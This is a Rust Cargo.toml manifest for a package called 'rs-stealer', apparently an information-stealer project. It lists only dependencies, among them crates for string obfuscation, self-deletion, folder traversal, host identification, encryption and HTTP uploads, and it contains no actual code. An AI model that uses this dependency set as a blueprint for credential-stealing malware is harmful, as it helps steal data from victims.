[package]
name = "rs-stealer"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
obfstr = "0.3.0"
houdini = "1.0.2"
walkdir = "2.3.2"
openssl = { version = "0.10", features = ["vendored"] }
zeroize = "1.5.5"
whoami = "1.2.1"
dirs = "4.0"
reqwest = { version = "0.11.10", features = ["blocking"] }

[rust]
debuginfo-level = 1

[profile.release]
debug = 1